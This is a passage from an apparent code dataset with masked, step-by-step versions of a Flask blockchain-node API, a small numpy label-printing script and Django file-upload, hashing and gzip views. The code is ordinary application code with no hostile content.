resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-3": "<mask token>\nfm = filemanager()\nnode = Node(fm)\napp = Flask(__name__)\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-4": "from flask import Flask, request, jsonify\nfrom app import Node\nfrom dbm2 import filemanager\nfm = filemanager()\nnode = Node(fm)\napp = Flask(__name__)\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-5": "#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, request, jsonify\nfrom app import Node\nfrom dbm2 import filemanager\n\nfm = filemanager()\nnode = Node(fm)\n\napp = Flask(__name__)\n\[email protected](\"/transactions/isfull\",methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\[email protected](\"/transactions/new\",methods=[\"POST\"])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(),transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\[email protected](\"/chain/last\",methods=[\"GET\"])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\[email protected](\"/chain\",methods=[\"GET\"])\ndef get_chain():\n return jsonify(node.chain), 200\[email protected](\"/pnodes/register\",methods=[\"POST\"])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes)==list:\n if len(nodes)>10 and nodes!=[]:\n nodes = nodes[:10]\n s = [] #succeed\n f = [] #failed\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {\"Added PNodes\":s,\n \"Not added pnodes\":f}\n return jsonify(resp), 200\n resp = {\"Error\":\"Input format error\"}\n return jsonify(resp), 400\[email protected](\"/pnodes/size\",methods=[\"GET\"])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\[email protected](\"/nodes\",methods=[\"GET\"])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\[email protected](\"/nodes/resolve\",methods=[\"GET\"])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return \"0 nodes added\",400\n\[email protected](\"/chain/resolve\",methods=[\"GET\"])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print(\"Nothing\")\n return jsonify(r), 400\[email protected](\"/mine\",methods=[\"GET\"])\ndef mine():\n mb = node.mine()\n resp = {\"Mined_block\":mb}\n return jsonify(resp), 200\nif __name__==\"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\",\"--port\",default=node.DEFAULT_PORT,type=int,help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port=port\n app.run(host=\"\",port=port)\n \n",
"step-ids": [
8,
11,
12,
13,
14
]
}
|
[
8,
11,
12,
13,
14
] |
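For readers who want to exercise the Flask node API above, a minimal client sketch using the requests library follows. The base URL and the transaction payload are assumptions made for illustration; the real default port comes from node.DEFAULT_PORT and the expected transaction fields are defined by the Node class, neither of which is shown here:

# Hypothetical client for the node API above; base URL and payload fields are assumptions.
import requests

BASE = 'http://localhost:5000'

# fetch the current chain and the last block
chain = requests.get(BASE + '/chain').json()
last_block = requests.get(BASE + '/chain/last').json()

# submit a transaction (the endpoint echoes the transaction back, or returns false)
txn = {'sender': 'a', 'recipient': 'b', 'amount': 1}  # illustrative fields only
print(requests.post(BASE + '/transactions/new', json=txn).json())

# trigger mining, then run the consensus endpoints
print(requests.get(BASE + '/mine').json())
print(requests.get(BASE + '/nodes/resolve').status_code)
print(requests.get(BASE + '/chain/resolve').status_code)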
import numpy as np
labels = np.load('DataVariationOther/w1_s500/targetTestNP.npy')
for lab in labels:
print(lab)
|
normal
|
{
"blob_id": "a83988e936d9dee4838db61c8eb8ec108f5ecd3f",
"index": 4669,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor lab in labels:\n print(lab)\n",
"step-3": "<mask token>\nlabels = np.load('DataVariationOther/w1_s500/targetTestNP.npy')\nfor lab in labels:\n print(lab)\n",
"step-4": "import numpy as np\nlabels = np.load('DataVariationOther/w1_s500/targetTestNP.npy')\nfor lab in labels:\n print(lab)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
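A small follow-up to the snippet above: instead of printing every label, the class distribution of the same array can be summarised directly with numpy.unique; nothing beyond the file already being loaded is assumed:

# Summarise the label distribution instead of printing each entry.
import numpy as np

labels = np.load('DataVariationOther/w1_s500/targetTestNP.npy')
values, counts = np.unique(labels, return_counts=True)
for value, count in zip(values, counts):
    print(value, count)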
__author__ = 'fshaw'
import gzip
import hashlib
import os
import uuid
import json
import jsonpickle
from chunked_upload.models import ChunkedUpload
from chunked_upload.views import ChunkedUploadView, ChunkedUploadCompleteView
from django.conf import settings
from django.core import serializers
from django.core.files.base import ContentFile
from django.http import HttpResponse
from django.template.context_processors import csrf
from rest_framework.renderers import JSONRenderer
import web.apps.web_copo.schemas.utils.data_utils as d_utils
import web.apps.web_copo.utils.EnaUtils as u
from dal.broker_da import BrokerDA
from dal.copo_da import DataFile
from web.apps.web_copo.rest.models import CopoChunkedUpload
class CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):
do_md5_check = False
def get_response_data(self, chunked_upload, request):
"""
Data for the response. Should return a dictionary-like object.
Called *only* if POST is successful.
"""
files = {'files': {}}
files['files']['name'] = chunked_upload.filename
files['files']['id'] = chunked_upload.id
files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)
files['files']['url'] = ''
files['files']['thumbnailUrl'] = ''
files['files']['deleteUrl'] = ''
files['files']['deleteType'] = 'DELETE'
str = jsonpickle.encode(files)
return files
class CopoChunkedUploadView(ChunkedUploadView):
model = CopoChunkedUpload
'''
'''
class JSONResponse(HttpResponse):
"""
An HttpResponse that renders its content into JSON.
"""
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json'
super(JSONResponse, self).__init__(content, **kwargs)
def receive_data_file(request):
# this method is called for writing smaller files (<= 260MB) to disk, larger files use the
# upload method in ChunkedUpload class
from django.utils import timezone
    # need to make a chunked upload record to store details of the file
if request.method == 'POST':
c = {}
f = request.FILES['file']
fname = f.__str__()
attrs = {'user': request.user, 'filename': fname, 'completed_on': timezone.now(), 'offset': f.size}
chunked_upload = ChunkedUpload(**attrs)
# file starts empty
chunked_upload.file.save(name='', content=ContentFile(''), save=True)
path = chunked_upload.file
destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name), 'wb+')
for chunk in f.chunks():
destination.write(chunk)
destination.close()
c.update(csrf(request))
# create output structure to pass back to jquery-upload
files = {'files': {}}
files['files']['name'] = f._name
files['files']['size'] = path.size / (1000 * 1000.0)
files['files']['id'] = chunked_upload.id
files['files']['url'] = ''
files['files']['thumbnailUrl'] = ''
files['files']['deleteUrl'] = ''
files['files']['deleteType'] = 'DELETE'
str = jsonpickle.encode(files)
return HttpResponse(str, content_type='json')
def resume_chunked(request):
file_name = request.GET.get('filename')
user_id = request.user.id
# retrieve incomplete file for user with this name
d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id, filename=file_name).order_by(
'-offset')[:1]
if d:
out = serializers.serialize('json', d)
return HttpResponse(jsonpickle.encode(out))
else:
return HttpResponse(jsonpickle.encode(''))
def get_partial_uploads(request):
user_id = request.user.id
d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id).order_by('created_on')
if d:
out = serializers.serialize('json', d)
return HttpResponse(jsonpickle.encode(out))
else:
return HttpResponse(jsonpickle.encode(''))
def hash_upload(request):
# utility method to create an md5 hash of a given file path
# open uploaded file
file_id = request.GET['file_id']
print('hash started ' + file_id)
file_obj = ChunkedUpload.objects.get(pk=file_id)
file_name = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)
# now hash opened file
md5 = hashlib.md5()
with open(file_name, 'rb') as f:
for chunk in iter(lambda: f.read(8192), b''):
md5.update(chunk)
file_obj.hash = md5.hexdigest()
file_obj.save()
output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}
# update record in mongo
record_object = DataFile().get_by_file_id(file_id)
auto_fields = dict()
auto_fields[DataFile().get_qualified_field("file_hash")] = file_obj.hash
profile_id = request.session['profile_id']
component = "datafile"
BrokerDA(target_id=str(record_object.get("_id", str())),
component=component,
auto_fields=auto_fields
).do_save_edit()
out = json.dumps(output_dict)
print('hash complete ' + file_id)
return HttpResponse(out, content_type='json')
def inspect_file(request):
# utility method to examine a file and return meta-data to the frontend
output_dict = {'file_type': 'unknown', 'do_compress': False}
# get reference to file
file_id = request.GET['file_id']
chunked_upload = ChunkedUpload.objects.get(id=int(file_id))
file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)
# size threshold to determine if a file should be compressed
zip_threshold = 200000000 # size in bytes
# check if file is compressed
is_zipped = u.is_gzipped(file_name)
if chunked_upload.offset >= zip_threshold and not is_zipped:
output_dict['do_compress'] = True
# check for file type
if u.is_pdf_file(file_name):
output_dict['file_type'] = 'pdf'
else:
try:
if u.is_fastq_file(file_name):
output_dict['file_type'] = 'fastq'
if not is_zipped:
output_dict['do_compress'] = True
elif u.is_sam_file(file_name):
output_dict['file_type'] = 'sam'
if not is_zipped:
output_dict['do_compress'] = False
elif u.is_bam_file(file_name):
output_dict['file_type'] = 'bam'
if not is_zipped:
output_dict['do_compress'] = False
else: # make file type same as extension
output_dict['file_type'] = chunked_upload.filename.rsplit('.')[1]
except:
output_dict['file_type'] = 'unknown'
# add datafile schema
chunked_upload.type = output_dict['file_type']
chunked_upload.save()
# ...and obtain the inserted record
profile_id = request.session['profile_id']
component = "datafile"
auto_fields = dict()
auto_fields[DataFile().get_qualified_field("file_id")] = file_id
auto_fields[DataFile().get_qualified_field("file_type")] = output_dict['file_type']
auto_fields[DataFile().get_qualified_field("file_location")] = file_name
auto_fields[DataFile().get_qualified_field("file_size")] = u.filesize_toString(chunked_upload.offset)
auto_fields[DataFile().get_qualified_field("name")] = chunked_upload.filename
# get default type from schema
type = [f for f in d_utils.get_copo_schema(component) if f.get("id").split(".")[-1] == "type"]
if type:
type = type[0]["default_value"]
auto_fields[DataFile().get_qualified_field("type")] = type
df = BrokerDA(context=dict(),
profile_id=profile_id,
component=component,
auto_fields=auto_fields,
visualize="last_record"
).do_save_edit().get("record_object", dict())
out = jsonpickle.encode(output_dict)
return HttpResponse(out, content_type='json')
def zip_file(request):
# need to get a reference to the file to zip
file_id = request.GET['file_id']
print("zip started " + file_id)
file_obj = ChunkedUpload.objects.get(pk=file_id)
# get the name of the file to zip and change its suffix to .gz
output_file_location = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)
output_file_name = file_obj.filename + '.gz'
    # open the source in binary mode (uploads may be binary, e.g. bam files) and
    # stream it into a gzip archive in n-byte chunks; the with-blocks make sure
    # both handles are closed even if opening or writing fails
    temp_name = os.path.join(settings.MEDIA_ROOT, str(uuid.uuid4()) + '.tmp')
    n = 100000000
    with open(output_file_location, 'rb') as src, \
            gzip.open(temp_name, 'wb', compresslevel=1) as myzip:
        for chunk in iter(lambda: src.read(n), b''):
            myzip.write(chunk)
print('zip complete ' + file_id)
# now need to delete the old file and update the file record with the new file
new_file_name = output_file_location + '.gz'
os.rename(temp_name, new_file_name)
os.remove(output_file_location)
# calculate new file size
stats = os.stat(new_file_name)
new_file_size = stats.st_size / 1000 / 1000
# update filename
file_obj.filename = output_file_name
file_obj.file.name = new_file_name
# update file size
file_obj.offset = stats.st_size
file_obj.save()
out = {'zipped': True, 'file_name': output_file_name, 'file_size': new_file_size}
# update record in mongo
record_object = DataFile().get_by_file_id(file_id)
auto_fields = dict()
auto_fields[DataFile().get_qualified_field("file_size")] = u.filesize_toString(file_obj.offset)
auto_fields[DataFile().get_qualified_field("name")] = output_file_name
auto_fields[DataFile().get_qualified_field("file_location")] = new_file_name
profile_id = request.session['profile_id']
component = "datafile"
BrokerDA(target_id=str(record_object.get("_id", str())),
component=component,
auto_fields=auto_fields
).do_save_edit()
out = jsonpickle.encode(out)
return HttpResponse(out, content_type='json')
|
normal
|
{
"blob_id": "2b7415d86f9157ae55228efdd61c9a9e9920bc5c",
"index": 7716,
"step-1": "<mask token>\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n \"\"\"\n \"\"\"\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n from django.utils import timezone\n if request.method == 'POST':\n c = {}\n f = request.FILES['file']\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on':\n timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name\n ), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n files = {'files': {}}\n files['files']['name'] = f._name\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=\n user_id, filename=file_name).order_by('-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\n<mask token>\n\n\ndef inspect_file(request):\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n file_id = request.GET['file_id']\n chunked_upload = ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n zip_threshold = 200000000\n is_zipped = u.is_gzipped(file_name)\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n else:\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[\n 1]\n except:\n output_dict['file_type'] = 'unknown'\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n profile_id = 
request.session['profile_id']\n component = 'datafile'\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_id')] = file_id\n auto_fields[DataFile().get_qualified_field('file_type')] = output_dict[\n 'file_type']\n auto_fields[DataFile().get_qualified_field('file_location')] = file_name\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field('name')\n ] = chunked_upload.filename\n type = [f for f in d_utils.get_copo_schema(component) if f.get('id').\n split('.')[-1] == 'type']\n if type:\n type = type[0]['default_value']\n auto_fields[DataFile().get_qualified_field('type')] = type\n df = BrokerDA(context=dict(), profile_id=profile_id, component=\n component, auto_fields=auto_fields, visualize='last_record'\n ).do_save_edit().get('record_object', dict())\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n \"\"\"\n \"\"\"\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n from django.utils import timezone\n if request.method == 'POST':\n c = {}\n f = request.FILES['file']\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on':\n timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name\n ), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n files = {'files': {}}\n files['files']['name'] = f._name\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=\n user_id, filename=file_name).order_by('-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\n<mask token>\n\n\ndef hash_upload(request):\n file_id = request.GET['file_id']\n print('hash started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n file_name = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n md5 = hashlib.md5()\n with open(file_name, 'rb') as f:\n for chunk in iter(lambda : f.read(8192), b''):\n md5.update(chunk)\n file_obj.hash = md5.hexdigest()\n file_obj.save()\n output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_hash')] = file_obj.hash\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n out = json.dumps(output_dict)\n print('hash complete ' + file_id)\n return HttpResponse(out, content_type='json')\n\n\ndef inspect_file(request):\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n file_id = request.GET['file_id']\n chunked_upload = 
ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n zip_threshold = 200000000\n is_zipped = u.is_gzipped(file_name)\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n else:\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[\n 1]\n except:\n output_dict['file_type'] = 'unknown'\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n profile_id = request.session['profile_id']\n component = 'datafile'\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_id')] = file_id\n auto_fields[DataFile().get_qualified_field('file_type')] = output_dict[\n 'file_type']\n auto_fields[DataFile().get_qualified_field('file_location')] = file_name\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field('name')\n ] = chunked_upload.filename\n type = [f for f in d_utils.get_copo_schema(component) if f.get('id').\n split('.')[-1] == 'type']\n if type:\n type = type[0]['default_value']\n auto_fields[DataFile().get_qualified_field('type')] = type\n df = BrokerDA(context=dict(), profile_id=profile_id, component=\n component, auto_fields=auto_fields, visualize='last_record'\n ).do_save_edit().get('record_object', dict())\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n \"\"\"\n \"\"\"\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n from django.utils import timezone\n if request.method == 'POST':\n c = {}\n f = request.FILES['file']\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on':\n timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name\n ), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n files = {'files': {}}\n files['files']['name'] = f._name\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=\n user_id, filename=file_name).order_by('-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\n<mask token>\n\n\ndef hash_upload(request):\n file_id = request.GET['file_id']\n print('hash started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n file_name = 